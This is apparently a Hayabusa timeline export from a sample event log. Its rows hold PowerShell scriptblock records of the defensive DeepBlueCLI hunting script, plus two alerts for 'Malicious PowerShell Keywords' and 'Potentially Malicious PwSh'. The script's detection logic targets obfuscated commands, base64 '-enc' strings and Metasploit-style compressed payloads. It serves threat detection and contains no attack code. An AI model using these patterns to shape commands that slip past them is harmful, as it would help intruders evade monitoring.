Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:44:35.130 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. 
$groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $output += $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:44:35.136 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:44:35.139 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} 
""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:44:48.428 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:44:48.428 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:44:48.429 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:44:48.430 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:44:48.522 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:44:48.524 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:44:48.525 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:44:49.697 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:47:01.700 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:47:01.705 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are 
typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. 
(Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. 
$servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. 
$output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { #",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:47:01.705 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
